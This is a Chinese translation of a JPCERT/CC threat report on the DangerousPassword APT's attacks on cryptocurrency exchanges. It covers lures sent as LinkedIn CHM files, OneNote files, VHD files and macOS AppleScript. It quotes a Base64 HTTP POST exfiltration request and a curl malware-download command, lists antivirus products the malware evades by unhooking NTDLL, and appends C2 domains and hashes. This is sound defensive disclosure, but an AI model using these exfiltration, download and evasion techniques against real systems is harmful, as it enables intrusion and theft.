自 2019 年 6 月以来,JPCERT/CC 持续观察到被认为与DangerousPassword 攻击活动(也称为 CryptoMimic 或 SnatchCrypto)有关的加密货币交易所的攻击。多年来,攻击者一直使用通过发送快捷方式文件来感染目标恶意软件的攻击技术通过电子邮件给他们。但是,众所周知,他们还使用各种其他攻击模式来用恶意软件感染目标。本文将介绍近期观察DangerousPassword的攻击手法。本报告描述了以下四种攻击模式。
-
通过从 LinkedIn 发送恶意 CHM 文件进行攻击
-
使用 OneNote 文件的攻击
-
使用虚拟硬盘文件的攻击
-
针对 macOS 的攻击
通过从 LinkedIn 发送恶意 CHM 文件进行攻击
除了将恶意软件作为电子邮件附件发送外,攻击者还可能通过 LinkedIn 联系目标并向他们发送恶意软件。图 1 显示了通过 LinkedIn 发送的恶意软件如何感染主机。
通过 LinkedIn 发送的文件以 RAR 格式压缩,解压缩后包含一个 Windows 帮助文件(CHM 文件)。
执行此文件时,它会下载并执行外部 Windows Installer 文件(MSI 文件)。执行的 MSI 文件使用 PowerShell 脚本下载并执行额外的 MSI 文件(图 1 中的 Administrator-a214051.msi;文件名为[user name of the user who executed it]-a[5 random digits]1.msi)。此 MSI 文件能够发送有关受感染主机的信息,信息通过 HTTP POST 请求发送,如下所示。信息是 Base64 编码的。
POST /test.msi HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: ja-JP
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: [Size]
Host: [Server name]
VGltZToJV2VkIERl(...)
图 2 显示了用于收集有关受感染主机的信息的部分恶意软件代码。你可以看到它是用 JScript 编写的。
此外,我们已经确认,与目标联系的LinkedIn帐户会发送伪装成提供工作的人的恶意软件。图 3 显示了联系目标的LinkedIn帐户,我们认为该帐户已被攻击者入侵。到目前为止,我们还没有弄清楚攻击者是如何破坏SNS帐户的。
图 3:攻击者滥用LinkedIn帐户的示例
使用 OneNote 文件进行攻击
通过使用 Emotet 和其他恶意软件的攻击中也证实了通过利用 OneNote 文件感染恶意软件的方法。这在通过电子邮件附件传播感染的攻击类型中变得越来越流行。DangerousPassword 使用类似的攻击技术:它发送嵌入恶意软件的 OneNote 文件,如图 4 所示,单击查看 OneNote 文件时出现的图标(图 4 中的 PDF 图标)会导致恶意软件感染。
嵌入在OneNote文件中的恶意软件是一个MSI文件,它将DLL文件保存在主机上并执行它。DLL 文件使用下面的 curl 命令下载恶意软件。
curl -A cur1-agent -L [URL] -x [Proxy] -s -d dl
该恶意软件还具有检测防病毒软件的功能,如图 5 所示。
当检测到以下防病毒软件时,恶意软件会更改其行为:取消与 NTDLL 的挂钩进程以绕过防病毒软件 [1] 的监视,更改执行 curl 命令时发送的数据( 或 ),并更改执行下载的恶意软件的方式(注入资源管理器或开始使用 Rundll32)。dlda
-
阿维斯特
-
阿维拉
-
比特卫士
-
卡巴斯基
-
索福斯
-
趋势科技
-
Windows Defender
使用虚拟硬盘文件的攻击
除了压缩 ZIP 或 RAR 格式的恶意软件或将其包含在 ISO 文件中外,攻击者还可能将其包含在虚拟硬盘文件(VHD 文件)中。VHD文件是一种在Hyper-V中使用硬盘的格式,这是一种虚拟化技术,可以通过双击Windows操作系统来挂载。图 6 显示了一个包含恶意软件的已装载 VHD 文件。它包含一个诱饵PDF文件,主要的恶意软件(DLL文件)和一个可执行文件(EXE文件)来启动DLL文件。
DLL 文件是恶意软件,其功能类似于上述 OneNote 文件中包含的恶意软件。
针对 macOS 的攻击
我们已经确认攻击者不仅针对Windows操作系统,还针对macOS。图 7 显示了针对 macOS 的恶意软件的文件结构。
如图 8 所示,包含一个 AppleScript,它使用 curl 命令下载未经授权的应用程序,然后执行它。main.scpt
执行下载的应用程序时,会出现一个如图 9 所示的窗口。它具有对要读取的文件内容进行异或解码的功能,从解码的 C2 下载文件并执行它(图 10)。
图 9:执行下载的恶意软件时显示的屏幕
另请参阅 jamf 博客 [2] 以获取有关恶意软件的更多信息。https://blogs.jpcert.or.jp/en/2023/05/dangerouspassword.html#2
结语中
APT演员DangerousPassword继续对加密货币交易所进行攻击。此攻击组可能会通过LinkedIn联系目标,因此在使用 SNS 时应小心。即使您使用macOS,也应该小心,因为攻击者也可以针对操作系统。有关本报告中描述的恶意软件的 C2 的信息,请参阅附录。
引用
[1] 红队笔记:使用 C++
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++ 解锁完整 DLL
[2] jamf:BlueNoroff APT 组织针对 macOS 使用“RustBucket”恶意软件
https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
附录 A:C2
-
www.thecloudnet.org
-
azure.protection-service.cloud
-
verify.azure-protect.online
-
docs.azure-protection.cloud
-
secure.azure-protection.cloud
-
web.j-ic.co
-
cloud.dnx.capital
-
104.200.137.32
-
one.microshare.cloud
-
www.capmarketreport.com
-
safe.doc-share.cloud
-
openaibt.com
-
cloud.espcapital.pro
-
autoprotect.com.de
Appendix B: Malware hash value
bdd109cba8346548dd6fe5110180aa23eb9f5805c90733025344a5881c15c9854867215129fead94a52e4b62ef6851b3170a0a8b66a87eadfc919f84257d25b8f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb31908e42d8cb30f5bda71516de7c5c6a329c7dddcae77e19f64379d351177b90782f24a4b8fa692489ddfdac5eb989f5852bbe0da05c2e27190047f77282b936fc07a2468fafc762e106dd33fd0734a05118eb96d66fcc7ed358669e888d53ca248867e775fda3c6c03c1daeb0e10d2ce5956cb1c164bbd980ff98fe2f97e38c5816eb32cbaadfc3477c823293a8c49cdf690b443c8fa3c19f98399c143df2b35f4f006bfb9136c304e0aabf75575360120d022567180ce6b9c1835e209c541e4fb31b9f5432fd09f1fa51a35e8de98fca6081d542827b855db4563be2e50e58f14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22826f2a2a25f7b7d42f54d18a99f6721f855ba903db7b125d7dea63d0e4e6df64d6c3d0d2dedfa37cd1bebded60f303b21da860dcac49cfaa06e3172f0b1138cef14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e2248bd1c5cf9ccc3d454ab80d7284abaf39028a228607d132bfa92ab2ceca47ca2f0cf1829a93751d2f7e812545af079a4efebd755f1ee50a8d4537770f692eaaf9472f5ecac1672186bc1275cc70f024c734d0e6926917ce22b2cb6b1765ce83eab31b0cb796b3ae001fb4d12d9cac8c98911e11322cb974bf8d2be9303259a5ef14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e225ad84c75b4a8825a4ee49fcb2ab895f0a51c9877fc4e50595fa1917ae1daa7488a7ba38d597e8230609df4153039d1bb898479d486e653a6d92d206dd4848c80ba186a1a97d4f647dad39cb3ccae5466bb8d5463ceedf470428484416265ef5f7e2b38decf1f826fbb792d762d9e6a29147e9ecb44eb2ad2c4dc08e7ee01a140c56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f77981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de040738106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880741be5e53a5dc7cebaa63d6ff624c5eff1a0e1817ede1e7fc0473a28b1ed7a33a131edf272f1df1c841a9c457a50011325b1e22e950d62c5e78d3060450e6b93b63bca8d35653ce17b99b89f00fbee9b5cb6a70420b7dd0c3194038b9031e3e29f7a7717884519763f043c39c1cb2a9605da123c18b72e5bedcd5d587a54a0e8a3f087c83453cde2bc845122c05ebeb60e8891e395b45823c192869ec1b72ea63a4aed5b9ad0827696a1bb5f3497a6a2aa26b453d27bfacbe3c8c47673aac98d02acbedc105104541e67eec1ef845c7d68d624faa56e81713e3216ca66a7f3c71bc742f1aebbc12220cd6bf761509fd3a7aae2d5de88dce8d45fb5cf79ad8ccba2fd03354c2ec433d2eedc28e85c0fe5841b848d5fff1e6583e2d9e1a81b6ca3049bfff97fbb2c5e53eeed6df36d2c93c7cca199d42c0247c784b39db90f173b26e376fc80b090b2ee04e7d3104d308a150e58538580109a74f4ac49bf36242360701bdae4b33de7c53e4a0708b7187f313730bd09c4c553847134f268160a73a064e62cb168affa9dac8a4374b582bfa289e182f8a5e0b731c4ea9408d99ae3a1a30091cf25740468cd1894d39fce07039f89f05eee90cf72aa085698eeeff6d18cda8fc17f0c412b209dda24784cbe666fe79a708c9965cd18eef85439adb27935839ab987a47b9bacc2daf12e7af590259abcfdd473c81a7e540e58ed5760eee5ee98f57ab2b30a3bf04b8fa9d7b90455ddf2d39c8c4e04958b77d9170411d0072130eb4ee81ffba5b703a16c276b0c59b408cb8aa3915980f0f098f04984
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):加密货币业务相关的恶意攻击趋势
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论